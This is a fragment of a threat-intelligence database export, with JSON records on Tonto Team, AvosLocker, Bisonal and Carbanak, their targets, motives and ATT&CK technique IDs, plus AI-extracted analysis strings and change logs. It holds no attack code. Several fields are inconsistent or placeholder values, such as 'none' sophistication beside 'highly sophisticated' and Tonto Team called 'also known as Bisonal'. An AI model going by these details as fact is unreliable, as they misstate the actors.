  "threat_actor_overview": "The Tonto Team,  also known as Karma Panda and Bronze Huntley,  is a threat actor group primarily focused on cyber espionage. They have historically targeted Asian nations,  such as South Korea and Japan,  as well as the United States and Taiwan. More recently,  their operations have expanded to include Russia and Pakistan.",
  "aliases": [
    "Karma Panda",
    "Bronze Huntley"
  ],
  "sources": [],
  "country_of_origin": "CN",
  "threat_actor_motives": [],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft",
    "Espionage"
  ],
  "threat_actor_resources": [
    "organization",
    "government"
  ],
  "threat_actor_type": [
    "nation-state"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "RU"
  ],
  "target_regions": [
    "eastern-europe"
  ],
  "target_populations": [
    "Information and Communication",
    "Public Administration and Defense",
    "Manufacturing"
  ],
  "target_industry_sectors": [
    "x-industry-sector--1dd8ed24-7655-4f0d-80ef-35c36a5b0593",
    "x-industry-sector--95c98046-4589-4c5f-976a-99089bb77b37",
    "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6",
    "x-industry-sector--8b825e7f-a701-41df-8938-8c304dc6d860"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Tonto Team\", \"country_of_origin\": \"CN\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"The Tonto Team,  also known as Karma Panda and Bronze Huntley,  is a threat actor group primarily focused on cyber espionage. They have historically targeted Asian nations,  such as South Korea and Japan,  as well as the United States and Taiwan. More recently,  their operations have expanded to include Russia and Pakistan.\", \"target_countries\": [\"RU\"], \"target_regions\": [\"eastern-europe\"], \"target_populations\": [\"XXXX\", \"Information and Communication\", \"Public Administration and Defense\", \"Manufacturing\"], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\", \"Espionage\"], \"target_industry_sectors\": [\"government-public-services\", \"technology\", \"government-national\", \"manufacturing\"], \"threat_actor_capabilities\": [\"TXXXX\", \"T1003\", \"T1090\", \"T1036\"], \"threat_actor_motives\": [], \"threat_actor_resources\": [\"organization\", \"government\"], \"threat_actor_type\": [\"nation-state\"], \"aliases\": [\"Karma Panda\", \"Bronze Huntley\"], \"vulnerabilities\": [], \"sources\": []}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Tonto Team\"], \"aliases\": [\"Karma Panda\", \"Bronze Huntley\"], \"country_of_origin\": [\"CN\"], \"target_countries\": [\"RU\"], \"target_regions\": [\"eastern-europe\", \"Asia\", \"Europe\"], \"threat_actor_overview\": [\"\", \"The Tonto Team\", \" also known as Karma Panda and Bronze Huntley\", \" is a threat actor group primarily focused on cyber espionage. They have historically targeted Asian nations\", \" such as South Korea and Japan\", \" as well as the United States and Taiwan. More recently\", \" their operations have expanded to include Russia and Pakistan.\"], \"target_populations\": [\"XXXX\", \"Information and Communication\", \"Public Administration and Defense\", \"Manufacturing\"], \"target_industry_sectors\": [\"government-public-services\", \"technology\", \"government-national\", \"manufacturing\"], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\", \"Espionage\"], \"threat_actor_capabilities\": [\"TXXXX\", \"T1003\", \"T1090\", \"T1036\"], \"threat_actor_motives\": [\"MXXXX\", \"MITRE ATT&CK Software IDs\"], \"threat_actor_resources\": [\"organization\", \"government\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"nation-state\"], \"attack_mitigations\": [\"\"], \"attack_consequences\": [\"\"], \"vulnerabilities\": [{\"CVE\": \"CVE-XXXX-XXXX\"}], \"sources\": []}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "approval_status_changed_on": {
    "$date": "2023-09-29T18:26:00.742Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "6517169561972ef79f695778"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-29T18:25:25.878Z"
      },
      "changes": [
        {
          "field": "threat_actor_capabilities",
          "previous_value": [
            "TXXXX",
            "T1003",
            "T1090",
            "T1036"
          ],
          "updated_value": []
        }
      ]
    },
    {
      "_id": {
        "$oid": "6517164861972ef79f695777"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-29T18:24:08.556Z"
      },
      "changes": [
        {
          "field": "target_populations",
          "previous_value": [
            "XXXX",
            "Information and Communication",
            "Public Administration and Defense",
            "Manufacturing"
          ],
          "updated_value": [
            "Information and Communication",
            "Public Administration and Defense",
            "Manufacturing"
          ]
        }
      ]
    }
  ],
  "threat_actor": "Tonto Team"
},
{
  "_id": {
    "$oid": "64fa250d763e7f5d55712944"
  },
  "report": {
    "$oid": "64fa24fd795f37678cbb2cce"
  },
  "threat_actor_overview": "AvosLocker is a ransomware that is written in C++ that is offered through the RaaS model. It has been observed targeting financial services,  government facilities,  and other critical infrastructure sectors in the United States. It has also been used against organizations in Belgium,  Canada,  China,  Germany,  Saudi Arabia,  Spain,  Syria,  Taiwan,  Turkey,  the United Arab Emirates,  and the United Kingdom., AvosLocker is a ransomware written in C++ offered through the RaaS model. It has been observed targeting financial services,  and critical infrastructure sectors in the United States. In 2022,  it expanded its operations to Belgium",
  "aliases": [],
  "sources": [
    "Bleeping Computer",
    "CISA",
    "Mitre",
    "Sophos",
    "Trend Micro"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft",
    "Disruption of Service",
    "Damage and Destruction"
  ],
  "threat_actor_capabilities": [
    "T1106",
    "T1547.001",
    "T1140",
    "T1564.003",
    "T1562.009",
    "T1036.008",
    "T1027",
    "T1027.007",
    "T1083",
    "T1135",
    "T1057",
    "T1124",
    "T1486",
    "T1489",
    "T1327"
  ],
  "threat_actor_type": [
    "unknown",
    "criminal"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "Belgium",
    "Canada",
    "China",
    "Germany",
    "Saudi Arabia",
    "Spain",
    "Syria",
    "Taiwan",
    "Turkey",
    "United Arab Emirates",
    "United Kingdom",
    "United States",
    "US",
    "BE",
    "CA",
    "CN",
    "DE",
    "SA",
    "ES",
    "SY",
    "TW",
    "TR",
    "AE",
    "GB"
  ],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--1dd8ed24-7655-4f0d-80ef-35c36a5b0593",
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
    "x-industry-sector--8b825e7f-a701-41df-8938-8c304dc6d860"
  ],
  "attack_mitigations": "",
  "attack_consequences": "Loss of sensitive data, Financial loss, loss of sensitive, personal data, financial loss",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"AvosLocker\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"Loss of sensitive data, Financial loss, loss of sensitive, personal data, financial loss\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"AvosLocker is a ransomware that is written in C++ that is offered through the RaaS model. It has been observed targeting financial services,  government facilities,  and other critical infrastructure sectors in the United States. It has also been used against organizations in Belgium,  Canada,  China,  Germany,  Saudi Arabia,  Spain,  Syria,  Taiwan,  Turkey,  the United Arab Emirates,  and the United Kingdom., AvosLocker is a ransomware written in C++ offered through the RaaS model. It has been observed targeting financial services,  and critical infrastructure sectors in the United States. In 2022,  it expanded its operations to Belgium\", \"target_countries\": [\"Belgium\", \"Canada\", \"China\", \"Germany\", \"Saudi Arabia\", \"Spain\", \"Syria\", \"Taiwan\", \"Turkey\", \"United Arab Emirates\", \"United Kingdom\", \"United States\", \"US\", \"BE\", \"CA\", \"CN\", \"DE\", \"SA\", \"ES\", \"SY\", \"TW\", \"TR\", \"AE\", \"GB\"], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\", \"Disruption of Service\", \"Damage and Destruction\"], \"target_industry_sectors\": [\"financial-services\", \"government-public-services\"], \"threat_actor_capabilities\": [\"T1106\", \"T1547.001\", \"T1140\", \"T1564.003\", \"T1562.009\", \"T1036.008\", \"T1027\", \"T1027.007\", \"T1083\", \"T1135\", \"T1057\", \"T1124\", \"T1486\", \"T1489\", \"T1529\", \"Execution (Native API)\", \"Persistence (Registry Run Keys / Startup Folder)\", \"Privilege Escalation (Registry Run Keys / Startup Folder)\", \"Defense Evasion (Deobfuscate/Decode Files or Information, Hidden Window, Safe Mode Boot, Masquerade File Type, Obfuscate File or Information, Dynamic API Resolution)\", \"Discovery (File and Directory Discovery, Network Share Discovery, Process Discovery, System Time Discovery)\", \"Impact (Data Encrypted for Impact, Service Stop, System Shutdown/Reboot)\", \"T1327\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"unknown\", \"criminal\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"Bleeping Computer\", \"CISA\", \"Mitre\", \"Sophos\", \"Trend Micro\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"AvosLocker\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [\"Belgium\", \"Canada\", \"China\", \"Germany\", \"Saudi Arabia\", \"Spain\", \"Syria\", \"Taiwan\", \"Turkey\", \"United Arab Emirates\", \"United Kingdom\", \"United States\", \"US\", \"BE\", \"CA\", \"CN\", \"DE\", \"SA\", \"ES\", \"SY\", \"TW\", \"TR\", \"AE\", \"GB\"], \"target_regions\": [\"united-states\", \"belgium\", \"canada\", \"china\", \"germany\", \"saudi-arabia\", \"spain\", \"syria\", \"taiwan\", \"turkey\", \"united-arab-emirates\", \"united-kingdom\", \"United States\", \"Belgium\", \"Canada\", \"China\", \"Germany\", \"Saudi Arabia\", \"Spain\", \"Syria\", \"Taiwan\", \"Turkey\", \"United Arab Emirates\", \"United Kingdom\", \"Americas\", \"Europe\", \"Taiwana\"], \"threat_actor_overview\": [\"AvosLocker is a ransomware that is written in C++ that is offered through the RaaS model. It has been observed targeting financial services\", \" government facilities\", \" and other critical infrastructure sectors in the United States. It has also been used against organizations in Belgium\", \" Canada\", \" China\", \" Germany\", \" Saudi Arabia\", \" Spain\", \" Syria\", \" Taiwan\", \" Turkey\", \" the United Arab Emirates\", \" and the United Kingdom.\", \"AvosLocker is a ransomware written in C++ offered through the RaaS model. It has been observed targeting financial services\", \" and critical infrastructure sectors in the United States. In 2022\", \" it expanded its operations to Belgium\"], \"target_populations\": [], \"target_industry_sectors\": [\"financial-services\", \"government-public-services\", \"critical-manufacturing\", \"critical manufacturing\", \"Financial Services\", \"Government\", \"Critical Infrastructure\"], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\", \"Disruption of Service\", \"Damage and Destruction\"], \"threat_actor_capabilities\": [\"T1106\", \"T1547.001\", \"T1140\", \"T1564.003\", \"T1562.009\", \"T1036.008\", \"T1027\", \"T1027.007\", \"T1083\", \"T1135\", \"T1057\", \"T1124\", \"T1486\", \"T1489\", \"T1529\", \"Execution (Native API)\", \"Persistence (Registry Run Keys / Startup Folder)\", \"Privilege Escalation (Registry Run Keys / Startup Folder)\", \"Defense Evasion (Deobfuscate/Decode Files or Information, Hidden Window, Safe Mode Boot, Masquerade File Type, Obfuscate File or Information, Dynamic API Resolution)\", \"Discovery (File and Directory Discovery, Network Share Discovery, Process Discovery, System Time Discovery)\", \"Impact (Data Encrypted for Impact, Service Stop, System Shutdown/Reboot)\", \"T1327\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"advanced\", \"intermediate\"], \"threat_actor_type\": [\"unknown\", \"criminal\"], \"attack_mitigations\": [], \"attack_consequences\": [\"Loss of sensitive data\", \"Financial loss\", \"loss of sensitive, personal data\", \"financial loss\"], \"vulnerabilities\": [], \"sources\": [\"Bleeping Computer\", \"CISA\", \"Mitre\", \"Sophos\", \"Trend Micro\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "approval_status_changed_on": {
    "$date": "2023-09-14T19:20:06.869Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "64fa2611795f37678cbb2cd1"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-07T19:35:45.145Z"
      },
      "changes": [
        {
          "field": "threat_actor_capabilities",
          "previous_value": [
            "T1106",
            "T1547.001",
            "T1140",
            "T1564.003",
            "T1562.009",
            "T1036.008",
            "T1027",
            "T1027.007",
            "T1083",
            "T1135",
            "T1057",
            "T1124",
            "T1486",
            "T1489",
            "T1529",
            "Execution (Native API)",
            "Persistence (Registry Run Keys / Startup Folder)",
            "Privilege Escalation (Registry Run Keys / Startup Folder)",
            "Defense Evasion (Deobfuscate/Decode Files or Information, Hidden Window, Safe Mode Boot, Masquerade File Type, Obfuscate File or Information, Dynamic API Resolution)",
            "Discovery (File and Directory Discovery, Network Share Discovery, Process Discovery, System Time Discovery)",
            "Impact (Data Encrypted for Impact, Service Stop, System Shutdown/Reboot)",
            "T1327"
          ],
          "updated_value": [
            "T1106",
            "T1547.001",
            "T1140",
            "T1564.003",
            "T1562.009",
            "T1036.008",
            "T1027",
            "T1027.007",
            "T1083",
            "T1135",
            "T1057",
            "T1124",
            "T1486",
            "T1489",
            "T1327"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64fa2579795f37678cbb2cd0"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-07T19:33:13.590Z"
      },
      "changes": [
        {
          "field": "target_industry_sectors",
          "previous_value": [
            {
              "id": "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
              "name": "financial-services",
              "description": null,
              "created": "2023-08-24 13:57:04.385000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--8b825e7f-a701-41df-8938-8c304dc6d860",
              "name": "government-public-services",
              "description": null,
              "created": "2023-08-24 13:57:04.399000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            }
          ],
          "updated_value": [
            {
              "id": "x-industry-sector--1dd8ed24-7655-4f0d-80ef-35c36a5b0593",
              "name": "manufacturing",
              "description": null,
              "created": "2023-08-24 13:57:04.425000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
              "name": "financial-services",
              "description": null,
              "created": "2023-08-24 13:57:04.385000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--8b825e7f-a701-41df-8938-8c304dc6d860",
              "name": "government-public-services",
              "description": null,
              "created": "2023-08-24 13:57:04.399000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            }
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64fa252e795f37678cbb2ccf"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-07T19:31:58.291Z"
      },
      "changes": [
        {
          "field": "threat_actor_resources",
          "previous_value": [
            "organization"
          ],
          "updated_value": []
        }
      ]
    }
  ],
  "threat_actor": "AvosLocker"
},
{
  "_id": {
    "$oid": "64fa281567f750aba16f8f87"
  },
  "report": {
    "$oid": "64fa27fc795f37678cbb2cd2"
  },
  "threat_actor_overview": "Bisonal is a RAT believed to be exclusively used by Chinese groups. It has been used by the Tonto Team since 2010 against various sectors in Russia,  South Korea,  and Japan. Its main intent is to gain access to system information,  execute commands,  and download/run files on the victim's machine. The end game is operational intelligence gathering and espionage. Bisonal constantly evolves to lower detection rates and increase success., Tonto Team is a Chinese state-sponsored threat actor known for using the Bisonal RAT to conduct cyber espionage operations against various sectors in Russia,  and Japan since 2010., Tonto Team,  also known as Bisonal,  is a sophisticated nation-state threat actor originating from China. They primarily target the government-public-services and technology sectors in the Asian region. The Tonto Team has been active since 2010 and is associated with the RAT (Remote Access Trojan) named Bisonal. They have a high level of expertise and are supported by state resources., Tonto Team is a threat actor group believed to be of Chinese origin. They have been active since 2010 and primarily use the Bisonal RAT to target private and public sectors in Russia,  and Japan. Their main intent is to gain access to system information,  and download/run files on the victim's machine. Tonto Team is highly sophisticated and constantly evolves their tactics to lower detection rates and increase their success.",
  "sources": [
    "Dark Reading",
    "Talos Intelligence",
    "Reactionary",
    "Mitre"
  ],
  "country_of_origin": "CN",
  "threat_actor_motives": [
    "Espionage"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Espionage"
  ],
  "threat_actor_capabilities": [
    "T1566.001",
    "T1059.005",
    "T1059.003",
    "T1106",
    "T1204.002",
    "T1547.001",
    "T1543.003",
    "T1137.006",
    "T1547.001",
    "T1543.003",
    "T1140",
    "T1070.004",
    "T1036",
    "T1036.005",
    "T1112",
    "T1027",
    "T1027.001",
    "T1027.002",
    "T1218.011",
    "T1497",
    "T1497.003",
    "T1083",
    "T1057",
    "T1012",
    "T1082",
    "T1016",
    "T1124",
    "T1497",
    "T1497.003",
    "T1005",
    "T1071.001",
    "T1132.001",
    "T1568",
    "T1573.001",
    "T1105",
    "T1095",
    "T1090",
    "T1041"
  ],
  "threat_actor_resources": [
    "government",
    "organization"
  ],
  "threat_actor_type": [
    "nation-state",
    "unknown"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "RU",
    "KR",
    "JP"
  ],
  "target_regions": [
    "eastern-asia",
    "asia"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--8b825e7f-a701-41df-8938-8c304dc6d860"
  ],
  "attack_mitigations": "Monitor system and network discovery,  process monitoring,  and file scanning. Analyze network data for unexpected or unusual changes.",
  "attack_consequences": "Loss of sensitive data and potential gateway for other malware attacks., If a Bisonal attack by Tonto Team is successful,  there is a risk of sensitive data loss and potential for further malware attacks on the compromised system., loss of sensitive data, gateway for other malware",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Bisonal, Tonto Team\", \"country_of_origin\": \"CN\", \"attack_mitigations\": \"Monitor system and network discovery,  process monitoring,  and file scanning. Analyze network data for unexpected or unusual changes.\", \"attack_consequences\": \"Loss of sensitive data and potential gateway for other malware attacks., If a Bisonal attack by Tonto Team is successful,  there is a risk of sensitive data loss and potential for further malware attacks on the compromised system., loss of sensitive data, gateway for other malware\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Bisonal is a RAT believed to be exclusively used by Chinese groups. It has been used by the Tonto Team since 2010 against various sectors in Russia,  South Korea,  and Japan. Its main intent is to gain access to system information,  execute commands,  and download/run files on the victim's machine. The end game is operational intelligence gathering and espionage. Bisonal constantly evolves to lower detection rates and increase success., Tonto Team is a Chinese state-sponsored threat actor known for using the Bisonal RAT to conduct cyber espionage operations against various sectors in Russia,  and Japan since 2010., Tonto Team,  also known as Bisonal,  is a sophisticated nation-state threat actor originating from China. They primarily target the government-public-services and technology sectors in the Asian region. The Tonto Team has been active since 2010 and is associated with the RAT (Remote Access Trojan) named Bisonal. They have a high level of expertise and are supported by state resources., Tonto Team is a threat actor group believed to be of Chinese origin. They have been active since 2010 and primarily use the Bisonal RAT to target private and public sectors in Russia,  and Japan. Their main intent is to gain access to system information,  and download/run files on the victim's machine. Tonto Team is highly sophisticated and constantly evolves their tactics to lower detection rates and increase their success.\", \"target_countries\": [\"RU\", \"KR\", \"JP\"], \"target_regions\": [\"eastern-asia\", \"asia\"], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Espionage\"], \"target_industry_sectors\": [\"government-public-services\", \"telecommunications\", \"technology\", \"manufacturing\", \"financial-services\"], \"threat_actor_capabilities\": [\"T1566.001\", \"T1059.005\", \"T1059.003\", \"T1106\", \"T1204.002\", \"T1547.001\", \"T1543.003\", \"T1137.006\", \"T1547.001\", \"T1543.003\", \"T1140\", \"T1070.004\", \"T1036\", \"T1036.005\", \"T1112\", \"T1027\", \"T1027.001\", \"T1027.002\", \"T1218.011\", \"T1497\", \"T1497.003\", \"T1083\", \"T1057\", \"T1012\", \"T1082\", \"T1016\", \"T1124\", \"T1497\", \"T1497.003\", \"T1005\", \"T1071.001\", \"T1132.001\", \"T1568\", \"T1573.001\", \"T1105\", \"T1095\", \"T1090\", \"T1041\"], \"threat_actor_motives\": [\"Espionage\"], \"threat_actor_resources\": [\"government\", \"organization\"], \"threat_actor_type\": [\"nation-state\", \"unknown\"], \"aliases\": [\"Bisonal\", \"Chinese state-sponsored group\"], \"vulnerabilities\": [], \"sources\": [\"Dark Reading\", \"Talos Intelligence\", \"Reactionary\", \"Mitre\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Bisonal\", \"Tonto Team\"], \"aliases\": [\"Bisonal\", \"Chinese state-sponsored group\"], \"country_of_origin\": [\"CN\"], \"target_countries\": [\"RU\", \"KR\", \"JP\"], \"target_regions\": [\"Asia\", \"eastern-asia\", \"Russia\", \"South Korea\", \"Japan\", \"asia\"], \"threat_actor_overview\": [\"Bisonal is a RAT believed to be exclusively used by Chinese groups. It has been used by the Tonto Team since 2010 against various sectors in Russia\", \" South Korea\", \" and Japan. Its main intent is to gain access to system information\", \" execute commands\", \" and download/run files on the victim's machine. The end game is operational intelligence gathering and espionage. Bisonal constantly evolves to lower detection rates and increase success.\", \"Tonto Team is a Chinese state-sponsored threat actor known for using the Bisonal RAT to conduct cyber espionage operations against various sectors in Russia\", \" and Japan since 2010.\", \"Tonto Team\", \" also known as Bisonal\", \" is a sophisticated nation-state threat actor originating from China. They primarily target the government-public-services and technology sectors in the Asian region. The Tonto Team has been active since 2010 and is associated with the RAT (Remote Access Trojan) named Bisonal. They have a high level of expertise and are supported by state resources.\", \"Tonto Team is a threat actor group believed to be of Chinese origin. They have been active since 2010 and primarily use the Bisonal RAT to target private and public sectors in Russia\", \" and Japan. Their main intent is to gain access to system information\", \" and download/run files on the victim's machine. Tonto Team is highly sophisticated and constantly evolves their tactics to lower detection rates and increase their success.\", \"\"], \"target_populations\": [], \"target_industry_sectors\": [\"government-public-services\", \"telecommunications\", \"technology\", \"manufacturing\", \"financial-services\"], \"threat_actor_intent\": [\"Information Theft\", \"Espionage\"], \"threat_actor_capabilities\": [\"T1566.001\", \"T1059.005\", \"T1059.003\", \"T1106\", \"T1204.002\", \"T1547.001\", \"T1543.003\", \"T1137.006\", \"T1547.001\", \"T1543.003\", \"T1140\", \"T1070.004\", \"T1036\", \"T1036.005\", \"T1112\", \"T1027\", \"T1027.001\", \"T1027.002\", \"T1218.011\", \"T1497\", \"T1497.003\", \"T1083\", \"T1057\", \"T1012\", \"T1082\", \"T1016\", \"T1124\", \"T1497\", \"T1497.003\", \"T1005\", \"T1071.001\", \"T1132.001\", \"T1568\", \"T1573.001\", \"T1105\", \"T1095\", \"T1090\", \"T1041\"], \"threat_actor_motives\": [\"Espionage\"], \"threat_actor_resources\": [\"government\", \"organization\"], \"threat_actor_sophistication\": [\"advanced\", \"expert\"], \"threat_actor_type\": [\"nation-state\", \"unknown\"], \"attack_mitigations\": [\"Monitor system and network discovery\", \" process monitoring\", \" and file scanning. Analyze network data for unexpected or unusual changes.\"], \"attack_consequences\": [\"Loss of sensitive data and potential gateway for other malware attacks.\", \"If a Bisonal attack by Tonto Team is successful\", \" there is a risk of sensitive data loss and potential for further malware attacks on the compromised system.\", \"loss of sensitive data\", \"gateway for other malware\"], \"vulnerabilities\": [], \"sources\": [\"Dark Reading\", \"Talos Intelligence\", \"Reactionary\", \"Mitre\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "approval_status_changed_on": {
    "$date": "2023-09-07T19:47:45.260Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "64fa28a8795f37678cbb2cd5"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-07T19:46:48.914Z"
      },
      "changes": [
        {
          "field": "target_industry_sectors",
          "previous_value": [
            {
              "id": "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6",
              "name": "technology",
              "description": null,
              "created": "2023-08-24 13:57:04.439000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--9ec6b337-b075-4143-8bda-13b2fdeea8f1",
              "name": "telecommunications",
              "description": null,
              "created": "2023-08-24 13:57:04.442000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--8b825e7f-a701-41df-8938-8c304dc6d860",
              "name": "government-public-services",
              "description": null,
              "created": "2023-08-24 13:57:04.399000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
              "name": "financial-services",
              "description": null,
              "created": "2023-08-24 13:57:04.385000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            },
            {
              "id": "x-industry-sector--1dd8ed24-7655-4f0d-80ef-35c36a5b0593",
              "name": "manufacturing",
              "description": null,
              "created": "2023-08-24 13:57:04.425000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            }
          ],
          "updated_value": [
            {
              "id": "x-industry-sector--8b825e7f-a701-41df-8938-8c304dc6d860",
              "name": "government-public-services",
              "description": null,
              "created": "2023-08-24 13:57:04.399000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            }
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64fa2841795f37678cbb2cd4"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-07T19:45:05.901Z"
      },
      "changes": [
        {
          "field": "aliases",
          "previous_value": [
            "Bisonal",
            "Chinese state-sponsored group"
          ],
          "updated_value": []
        }
      ]
    },
    {
      "_id": {
        "$oid": "64fa2824795f37678cbb2cd3"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-07T19:44:36.806Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "Bisonal, Tonto Team",
          "updated_value": "Bisonal"
        }
      ]
    }
  ],
  "threat_actor": "Bisonal"
},
{
  "_id": {
    "$oid": "64fa2b4267f750aba16f8f89"
  },
  "report": {
    "$oid": "64fa2b18795f37678cbb2cd7"
  },
  "threat_actor_overview": "Carbanak is a banking trojan discovered in 2014 that has targeted numerous financial institutions around the world., Carbanak is a banking trojan that was first discovered in 2014. It has been used to attack numerous financial institutions in many different countries.",
  "aliases": [],
  "sources": [
    "Malpedia",
    "Mitre",
    "The Record",
    "Trend Micro"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft",
    "Disruption of Service",
    "Espionage",
    "Credential Harvesting"
  ],
  "threat_actor_capabilities": [
    "Windows Command Shell (T1059.003)",
    "Registry Run Keys / Startup Folder (T1547.001)",
    "Local account (T1136.001)",
    "Portable Executable Injection (T1055.002)",
    "File Deletion (T1070.004)",
    "Obfuscated Files or Information (T1027)",
    "Keylogging (T1056.001)",
    "OS Credential Dumping (T1003)",
    "Process Discovery (T1057)",
    "Query Discovery (T1012)",
    "Remote Desktop Protocol (T1021.001)",
    "Local Email Collection (T1114.001)",
    "Screen Capture (T1113)",
    "Web Protocols (T1071.001)",
    "Standard Encoding (T1132.001)",
    "Symmetric Cryptography (T1573.001)",
    "Data Transfer Size Limits (T1030)",
    "T1059.003",
    "T1547.001",
    "T1136.001",
    "T1055.002",
    "T1070.004",
    "T1027",
    "T1056.001",
    "T1003",
    "T1057",
    "T1012",
    "T1021.001",
    "T1114.001",
    "T1113",
    "T1071.001",
    "T1132.001",
    "T1573.001",
    "T1030"
  ],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "criminal",
    "crime-syndicate"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "All countries"
  ],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df"
  ],
  "attack_mitigations": "Proper training, multi-factored authentication for sensitive files, and regularly backing up data",
  "attack_consequences": "If an attack was successful,  there would be a large loss of money.",
  "vulnerabilities": [],
